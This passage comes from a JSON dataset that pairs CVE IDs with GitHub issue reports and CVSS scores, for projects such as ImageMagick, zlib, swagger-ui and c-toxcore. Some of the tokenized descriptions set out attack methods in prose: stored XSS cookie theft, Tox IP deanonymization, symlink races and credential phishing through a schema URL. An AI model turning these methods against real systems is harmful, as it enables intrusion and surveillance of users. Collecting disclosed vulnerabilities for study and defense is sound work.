  30990. "baseScore": 8.8,
  30991. "impactScore": 5.9,
  30992. "exploitabilityScore": 2.8
  30993. },
  30994. {
  30995. "CVE_ID": "CVE-2018-21232",
  30996. "Issue_Url_old": "https://github.com/skvadrik/re2c/issues/219",
  30997. "Issue_Url_new": "https://github.com/skvadrik/re2c/issues/219",
  30998. "Repo_new": "skvadrik/re2c",
  30999. "Issue_Created_At": "2018-09-05T07:12:10Z",
  31000. "description": "overflow NUMBERTAG re test fails on system with small stack. Factoring out the issue of URLTAG On small stack systems ( APITAG ) APITAG test fails: ERRORTAG",
  31001. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31002. "severity": "MEDIUM",
  31003. "baseScore": 5.5,
  31004. "impactScore": 3.6,
  31005. "exploitabilityScore": 1.8
  31006. },
  31007. {
  31008. "CVE_ID": "CVE-2018-21234",
  31009. "Issue_Url_old": "https://github.com/oblac/jodd/issues/628",
  31010. "Issue_Url_new": "https://github.com/oblac/jodd/issues/628",
  31011. "Repo_new": "oblac/jodd",
  31012. "Issue_Created_At": "2018-08-17T13:37:15Z",
  31013. "description": "Potential vulnerability in JSON deserialization. Current behavior Jodd's Json parser supports polymorphic deserialization when APITAG is set. If an application parses JSON with this configuration from an untrusted source, it could lead to remote code execution. The problem is quite the same as in other Java JSON libraries. Here you can read more: URLTAG FILETAG Expected behavior At least, you should mention security implication of usage APITAG similar to Jackson databind URLTAG Steps to Reproduce the Problem If necessary, I could send an example of JSON which lead to RCE",
  31014. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  31015. "severity": "CRITICAL",
  31016. "baseScore": 9.8,
  31017. "impactScore": 5.9,
  31018. "exploitabilityScore": 3.9
  31019. },
  31020. {
  31021. "CVE_ID": "CVE-2018-21247",
  31022. "Issue_Url_old": "https://github.com/LibVNC/libvncserver/issues/253",
  31023. "Issue_Url_new": "https://github.com/libvnc/libvncserver/issues/253",
  31024. "Repo_new": "libvnc/libvncserver",
  31025. "Issue_Created_At": "2018-09-11T15:29:14Z",
  31026. "description": "SECURITY: memory leak in libvncclient in APITAG function. APITAG URLTAG function leaks memory, because tmphost buffer is filled by using snprintf function, but after buffer is being sent back to client using APITAG , which sent the whole tmphost buffer including its uninitialized part, which would expose uninitialized memory of client application. Example file APITAG contains same kind of vulnerability as well. This security issue is a result of my work at Kaspersky Lab ICS CERT Vulnerability Research Group at position of Security Researcher. For more information about ICS CERT please contact: ics EMAILTAG FILETAG Best regards, Pavel Cheremushkin",
  31027. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  31028. "severity": "HIGH",
  31029. "baseScore": 7.5,
  31030. "impactScore": 3.6,
  31031. "exploitabilityScore": 3.9
  31032. },
  31033. {
  31034. "CVE_ID": "CVE-2018-21269",
  31035. "Issue_Url_old": "https://github.com/OpenRC/openrc/issues/201",
  31036. "Issue_Url_new": "https://github.com/openrc/openrc/issues/201",
  31037. "Repo_new": "openrc/openrc",
  31038. "Issue_Created_At": "2018-01-24T14:40:26Z",
  31039. "description": "checkpath: symlinks are followed in non terminal path components. Let's use a separate issue for this so we don't conflate it with the race condition fix in URLTAG With the following service script, CODETAG I can replace APITAG (at my leisure) with a symlink to APITAG ... APITAG and the next time the service is restarted, checkpath will change ownership of APITAG : ERRORTAG Even if the service script checks the return value of checkpath , I have a moment to replace \"bar\" with a symlink. The systemd tmpfiles implementation has a similar issue URLTAG",
  31040. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  31041. "severity": "MEDIUM",
  31042. "baseScore": 5.5,
  31043. "impactScore": 3.6,
  31044. "exploitabilityScore": 1.8
  31045. },
  31046. {
  31047. "CVE_ID": "CVE-2018-21270",
  31048. "Issue_Url_old": "https://github.com/mhart/StringStream/issues/7",
  31049. "Issue_Url_new": "https://github.com/mhart/stringstream/issues/7",
  31050. "Repo_new": "mhart/stringstream",
  31051. "Issue_Created_At": "2018-05-14T23:16:57Z",
  31052. "description": "Uninitialized Memory Exposure. According to Snyk URLTAG , _stringstream_ has a vulnerability when run on FILETAG NUMBERTAG and below. The bug comes from this line : URLTAG More details can be found here : URLTAG Thank you for the package, by the way !",
  31053. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H",
  31054. "severity": "MEDIUM",
  31055. "baseScore": 6.5,
  31056. "impactScore": 4.2,
  31057. "exploitabilityScore": 2.2
  31058. },
  31059. {
  31060. "CVE_ID": "CVE-2018-25008",
  31061. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/51780",
  31062. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/51780",
  31063. "Repo_new": "rust-lang/rust",
  31064. "Issue_Created_At": "2018-06-25T15:44:34Z",
  31065. "description": "Insuficient synchronization in APITAG . Consider the following Rust code: ERRORTAG The first thread acquires the lock, modifies the variable, and then drop its Arc without unlocking (that's the point of the APITAG ). The second thread waits until the first thread decrements the count by dropping its Arc, and then uses APITAG to access the content without taking the lock (at that time, the mutex is still locked). My claim is that there is a race between the two accesses of the content of the mutex. The only reason the two accesses would be in a happens before relationship would be that APITAG and APITAG would establish this happens before relationship. However, even though APITAG does use a release write, APITAG only uses a relaxed read of the strong counter (via ERRORTAG ). The fix is to use an acquire read in ERRORTAG . I do not expect significant performance penalty here, since ERRORTAG already contains several release acquire accesses (of the weak count). CC APITAG",
  31066. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  31067. "severity": "MEDIUM",
  31068. "baseScore": 5.9,
  31069. "impactScore": 3.6,
  31070. "exploitabilityScore": 2.2
  31071. },
  31072. {
  31073. "CVE_ID": "CVE-2018-25021",
  31074. "Issue_Url_old": "https://github.com/TokTok/c-toxcore/issues/1214",
  31075. "Issue_Url_new": "https://github.com/toktok/c-toxcore/issues/1214",
  31076. "Repo_new": "toktok/c-toxcore",
  31077. "Issue_Created_At": "2018-09-28T08:19:22Z",
  31078. "description": "Massive red shutdown of nodes.",
  31079. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  31080. "severity": "HIGH",
  31081. "baseScore": 7.5,
  31082. "impactScore": 3.6,
  31083. "exploitabilityScore": 3.9
  31084. },
  31085. {
  31086. "CVE_ID": "CVE-2018-25022",
  31087. "Issue_Url_old": "https://github.com/TokTok/c-toxcore/issues/873",
  31088. "Issue_Url_new": "https://github.com/toktok/c-toxcore/issues/873",
  31089. "Repo_new": "toktok/c-toxcore",
  31090. "Issue_Created_At": "2018-04-15T06:46:40Z",
  31091. "description": "Onion vulnerability. Currently onion module allows to send any byte sequence through onion path. It can lead to possibility to bypass onion and get IP address (and friend list eventually) knowing only long term public key. Let's say Alice announces itself to Bob through onion path. After announcement Bob knows Alice's long term public key and onion return addresses to send packets back to Alice. But Bob doesn't know IP address of Alice and want to find it out. All he needs to do is send NAT ping request with his own DHT public key to Alice through onion path using onion return addresses he knows. If Bob is lucky enough to have close DHT public key to Alice's key Alice will redirect this ping request directly to Bob. After receiving his own request Bob will know IP address of Alice. Now, if somewone want to know somebody's IP address he can generate close enough long term public key, run many DHT nodes and send pings to them one by one. So I suggest to restrict packet kinds that can be sent through onion path: URLTAG I also monitored tox network through several DHT nodes and didn't notice anything other than onion announce/data packets. So this change shouldn't break anything.",
  31092. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
  31093. "severity": "LOW",
  31094. "baseScore": 3.1,
  31095. "impactScore": 1.4,
  31096. "exploitabilityScore": 1.6
  31097. },
  31098. {
  31099. "CVE_ID": "CVE-2018-25031",
  31100. "Issue_Url_old": "https://github.com/swagger-api/swagger-ui/issues/4872",
  31101. "Issue_Url_new": "https://github.com/swagger-api/swagger-ui/issues/4872",
  31102. "Repo_new": "swagger-api/swagger-ui",
  31103. "Issue_Created_At": "2018-09-13T03:02:46Z",
  31104. "description": "add an APITAG option. Content & configuration Swagger UI configuration options: APITAG Is your feature request related to a problem? APITAG We\u2019ve observed that the ?url= parameter in APITAG allows an attacker to override an otherwise hard coded schema file. This opens the door to issues such as URLTAG and URLTAG which would otherwise be prevented by hard coding the schema file URL. The behavior appears to be a regression in the NUMBERTAG releases. It can easily be reproduced by passing in a URL to the APITAG constructor and then using the ?url parameter to override it, while observing the behavior in the Net panel of your browser\u2019s developer tools. Note that CORS rules can prevent a test from succeeding, but do not prevent a real attack. const ui = APITAG ... url: 'some hard coded APITAG }); Additionally, the URL parameter is dangerous in general because it allows an attacker to provide a similar schema file that instead sends authorization requests to a server under an attacker\u2019s control, which makes it much easier to trick a user into leaking their login credentials. So the URL parameter should not be allowed in any setting where authentication or other sensitive information is used. I\u2019d recommend disabling it by default and cautioning users against enabling it. Describe the solution you'd like APITAG for NUMBERTAG Add an APITAG or similar option. ~If omitted,~ default to false ~if a URL is passed into the constructor, otherwise default true.~ for NUMBERTAG Change the default ~when omitted~ to false. Describe alternatives you've considered APITAG Our workaround was to detect the URL parameter before initializing APITAG and failing early if it was set. Additional context This is taken from a security report given to the Swagger team by Ken Winters, based on investigation done by Gaurav Shet and Ben Zulanch all over at APITAG The decision was made to put this in the public issue tracker because (a) we aren't going to immediately fix this, and (b) the attack surface for this is significantly diminished by our effective sanitization efforts to deter XSS attacks in documents used as input.",
  31105. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
  31106. "severity": "MEDIUM",
  31107. "baseScore": 4.3,
  31108. "impactScore": 1.4,
  31109. "exploitabilityScore": 2.8
  31110. },
  31111. {
  31112. "CVE_ID": "CVE-2018-25032",
  31113. "Issue_Url_old": "https://github.com/madler/zlib/issues/605",
  31114. "Issue_Url_new": "https://github.com/madler/zlib/issues/605",
  31115. "Repo_new": "madler/zlib",
  31116. "Issue_Created_At": "2022-03-26T19:07:23Z",
  31117. "description": "CVETAG (zlib memory corruption on deflate). CVETAG tracks a bug in zlib NUMBERTAG which allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches. There is a fix from MENTIONTAG at URLTAG MENTIONTAG reports at URLTAG that this patch never made it into a release, and at the time of writing no distros had picked it up as a fix.",
  31118. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  31119. "severity": "HIGH",
  31120. "baseScore": 7.5,
  31121. "impactScore": 3.6,
  31122. "exploitabilityScore": 3.9
  31123. },
  31124. {
  31125. "CVE_ID": "CVE-2018-25033",
  31126. "Issue_Url_old": "https://github.com/admesh/admesh/issues/28",
  31127. "Issue_Url_new": "https://github.com/admesh/admesh/issues/28",
  31128. "Repo_new": "admesh/admesh",
  31129. "Issue_Created_At": "2018-09-12T00:16:49Z",
  31130. "description": "heap buffer flow in stl_update_connects_remove NUMBERTAG Find a heap buffer overflow with the input. Hope this report is helpful. FILETAG ERRORTAG",
  31131. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  31132. "severity": "HIGH",
  31133. "baseScore": 8.1,
  31134. "impactScore": 5.2,
  31135. "exploitabilityScore": 2.8
  31136. },
  31137. {
  31138. "CVE_ID": "CVE-2018-3717",
  31139. "Issue_Url_old": "https://github.com/JacksonTian/anywhere/issues/33",
  31140. "Issue_Url_new": "https://github.com/jacksontian/anywhere/issues/33",
  31141. "Repo_new": "jacksontian/anywhere",
  31142. "Issue_Created_At": "2018-02-14T20:46:12Z",
  31143. "description": "Security issue. Hi, I'm a member of the FILETAG Security WG and we received a report regarding a security issue with this module. We tried inviting the author by e mail but received no response so I'm opening this issue and inviting anyone with commit and npm publish rights to collaborate with us on a fix.",
  31144. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  31145. "severity": "MEDIUM",
  31146. "baseScore": 5.4,
  31147. "impactScore": 2.7,
  31148. "exploitabilityScore": 2.3
  31149. },
  31150. {
  31151. "CVE_ID": "CVE-2018-3740",
  31152. "Issue_Url_old": "https://github.com/rgrove/sanitize/issues/176",
  31153. "Issue_Url_new": "https://github.com/rgrove/sanitize/issues/176",
  31154. "Repo_new": "rgrove/sanitize",
  31155. "Issue_Created_At": "2018-03-20T02:24:07Z",
  31156. "description": "Placeholder.",
  31157. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  31158. "severity": "HIGH",
  31159. "baseScore": 7.5,
  31160. "impactScore": 3.6,
  31161. "exploitabilityScore": 3.9
  31162. },
  31163. {
  31164. "CVE_ID": "CVE-2018-3744",
  31165. "Issue_Url_old": "https://github.com/danielcardoso/html-pages/issues/2",
  31166. "Issue_Url_new": "https://github.com/danielcardoso/html-pages/issues/2",
  31167. "Repo_new": "danielcardoso/html-pages",
  31168. "Issue_Created_At": "2018-01-30T15:18:16Z",
  31169. "description": "Security issue. Hello, The FILETAG ecosystem security team has received a report regarding this module. Previously, an email was sent to EMAILTAG , but no response was received. What is the best way to privately reach someone with commit rights to this repo? Feel free to reach out to me directly via the email address listed in my APITAG profile. Thanks!",
  31170. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  31171. "severity": "CRITICAL",
  31172. "baseScore": 9.8,
  31173. "impactScore": 5.9,
  31174. "exploitabilityScore": 3.9
  31175. },
  31176. {
  31177. "CVE_ID": "CVE-2018-3778",
  31178. "Issue_Url_old": "https://github.com/mcollina/aedes/issues/211",
  31179. "Issue_Url_new": "https://github.com/moscajs/aedes/issues/211",
  31180. "Repo_new": "moscajs/aedes",
  31181. "Issue_Created_At": "2018-08-06T17:08:09Z",
  31182. "description": "[SECURITY] Last will message is not checked against authorization. The LWT (last will and testament) message is not checked for authorization, so a client can have the broker publish on its behalf without that publish being authorized. Simple example: ERRORTAG Now, from a client, connect and subscribe to \"will\". From another client, connect with a last will message with topic \"will\". Then send a message to \"test\", breaking the connection (because of authorization failure). Breaking the connection triggers the LWT, and thus a message is sent to \"will\", which can be seen by the other client.",
  31183. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  31184. "severity": "MEDIUM",
  31185. "baseScore": 5.3,
  31186. "impactScore": 1.4,
  31187. "exploitabilityScore": 3.9
  31188. },
  31189. {
  31190. "CVE_ID": "CVE-2018-4862",
  31191. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4134",
  31192. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4134",
  31193. "Repo_new": "octopusdeploy/issues",
  31194. "Issue_Created_At": "2018-01-03T02:02:42Z",
  31195. "description": "Potential Azure account scoping bypass. An authenticated user with APITAG permission could reference an Azure account in such a way as to bypass the scoping restrictions. Relates to APITAG NUMBERTAG",
  31196. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  31197. "severity": "HIGH",
  31198. "baseScore": 8.8,
  31199. "impactScore": 5.9,
  31200. "exploitabilityScore": 2.8
  31201. },
  31202. {
  31203. "CVE_ID": "CVE-2018-4868",
  31204. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/202",
  31205. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/202",
  31206. "Repo_new": "exiv2/exiv2",
  31207. "Issue_Created_At": "2018-01-01T13:58:07Z",
  31208. "description": "APITAG error in sanitizer_posix.cc. version: exi NUMBERTAG a NUMBERTAG bit build) ./exi NUMBERTAG poc When there is not enough memory, this error is produced (found by afl): ERRORTAG testcase: URLTAG",
  31209. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31210. "severity": "MEDIUM",
  31211. "baseScore": 5.5,
  31212. "impactScore": 3.6,
  31213. "exploitabilityScore": 1.8
  31214. },
  31215. {
  31216. "CVE_ID": "CVE-2018-5212",
  31217. "Issue_Url_old": "https://github.com/Arsenal21/simple-download-monitor/issues/27",
  31218. "Issue_Url_new": "https://github.com/arsenal21/simple-download-monitor/issues/27",
  31219. "Repo_new": "arsenal21/simple-download-monitor",
  31220. "Issue_Created_At": "2018-01-02T09:53:54Z",
  31221. "description": "Vulnerability Report: Stored XSS bug in the latest version of simple download monitor. Well, sir, I just found a Stored XSS bug here. When I log into the wordpress panel, assume I have a low privilege role like a contributor user. Because the admin user has turned on the option of the wp plugin simple download monitor, a normal user like me can also use it. Now I can write something in the function APITAG Download\": APITAG But when I fuzz the parameters in this plugin, I found that when I write something into these points, the input is not filtered or escaped properly: APITAG FILETAG FILETAG While it tells us to enter a valid URL of the file in the text box below, I can write something with malicious content like: APITAG Then we can publish the post or just submit it to the admin user for review. FILETAG It won't be long before I get the other user's cookie or do something more malicious (the stored payload runs in the browser of whoever views the post, e.g. the admin reviewing it). FILETAG FILETAG Well, by the way, I only tested the bug in wordpress NUMBERTAG and the latest version of the wp plugin simple download monitor.",
  31222. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  31223. "severity": "MEDIUM",
  31224. "baseScore": 5.4,
  31225. "impactScore": 2.7,
  31226. "exploitabilityScore": 2.3
  31227. },
  31228. {
  31229. "CVE_ID": "CVE-2018-5246",
  31230. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/929",
  31231. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/929",
  31232. "Repo_new": "imagemagick/imagemagick",
  31233. "Issue_Created_At": "2018-01-04T01:33:05Z",
  31234. "description": "memory leaks. ubuntu APITAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): fontconfig freetype png x zlib ubuntu APITAG magick montage APITAG /dev/null montage: unrecognized image format ERRORTAG /dev/null' @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG f6b7dd in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG a6c3b in APITAG PATHTAG NUMBERTAG f NUMBERTAG dc9af1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG dcc2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG de3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG f1e5f NUMBERTAG in __libc_start_main PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG a6c3b in APITAG PATHTAG NUMBERTAG f NUMBERTAG dc9af1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG dcc2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG de3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG f1e5f NUMBERTAG in __libc_start_main PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ba NUMBERTAG e in __interceptor_posix_memalign ( PATHTAG NUMBERTAG f NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG a in APITAG PATHTAG NUMBERTAG f 
NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG a6c3b in APITAG PATHTAG NUMBERTAG f NUMBERTAG dc9af1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG dcc2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG de3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG f1e5f NUMBERTAG in __libc_start_main PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG a6 in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG a6c3b in APITAG PATHTAG NUMBERTAG f NUMBERTAG dc9af1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG dcc2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG de3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG f1e5f NUMBERTAG in __libc_start_main PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG be NUMBERTAG e in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG a6c3b in APITAG PATHTAG NUMBERTAG f NUMBERTAG dc9af1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG dcc2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG de3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG f1e5f NUMBERTAG in __libc_start_main PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f 
NUMBERTAG be NUMBERTAG e in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG a in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG a6c3b in APITAG PATHTAG NUMBERTAG f NUMBERTAG dc9af1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG dcc2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG de3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG f1e5f NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). FILETAG",
  31235. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31236. "severity": "MEDIUM",
  31237. "baseScore": 6.5,
  31238. "impactScore": 3.6,
  31239. "exploitabilityScore": 2.8
  31240. },
  31241. {
  31242. "CVE_ID": "CVE-2018-5247",
  31243. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/928",
  31244. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/928",
  31245. "Repo_new": "imagemagick/imagemagick",
  31246. "Issue_Created_At": "2018-01-04T01:30:39Z",
  31247. "description": "memory leaks. ubuntu APITAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): fontconfig freetype png x zlib ubuntu APITAG magick montage poc.rla /dev/null montage: improper image header ERRORTAG /dev/null' @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG cda5b in APITAG PATHTAG NUMBERTAG f NUMBERTAG b4a5aaf1 in APITAG PATHTAG NUMBERTAG f NUMBERTAG b4a5d2f4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG f3c7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG f NUMBERTAG b1e NUMBERTAG f NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). FILETAG",
  31248. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31249. "severity": "MEDIUM",
  31250. "baseScore": 6.5,
  31251. "impactScore": 3.6,
  31252. "exploitabilityScore": 2.8
  31253. },
  31254. {
  31255. "CVE_ID": "CVE-2018-5248",
  31256. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/927",
  31257. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/927",
  31258. "Repo_new": "imagemagick/imagemagick",
  31259. "Issue_Created_At": "2018-01-04T01:25:57Z",
  31260. "description": "heap buffer overflow in sixel_decode. ubuntu APITAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): fontconfig freetype png x zlib FILETAG ubuntu APITAG magick montage APITAG /dev/null APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG fcb NUMBERTAG a NUMBERTAG bp NUMBERTAG ffde NUMBERTAG a2fd0 sp NUMBERTAG ffde NUMBERTAG a2fc8 READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG fcb NUMBERTAG a NUMBERTAG in sixel_decode PATHTAG NUMBERTAG fcb NUMBERTAG a NUMBERTAG e in APITAG PATHTAG NUMBERTAG fcb NUMBERTAG a9af1 in APITAG PATHTAG NUMBERTAG fcb NUMBERTAG ac2f4 in APITAG PATHTAG NUMBERTAG fcb0fcbe3c7 in APITAG PATHTAG NUMBERTAG fcb0fc NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG fcb0d7c5f NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG a NUMBERTAG b in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG b9ad3 in malloc ( PATHTAG NUMBERTAG fcb NUMBERTAG a NUMBERTAG d in APITAG PATHTAG NUMBERTAG fcb NUMBERTAG a9af1 in APITAG PATHTAG NUMBERTAG fcb NUMBERTAG ac2f4 in APITAG PATHTAG NUMBERTAG fcb0fcbe3c7 in APITAG PATHTAG NUMBERTAG fcb0fc NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e4ce7 in APITAG PATHTAG NUMBERTAG e4ce7 in main PATHTAG NUMBERTAG fcb0d7c5f NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in sixel_decode Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8ea0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ec0: fa fa fa fa fa fa fa fa fa fa 
fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  31261. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  31262. "severity": "HIGH",
  31263. "baseScore": 8.8,
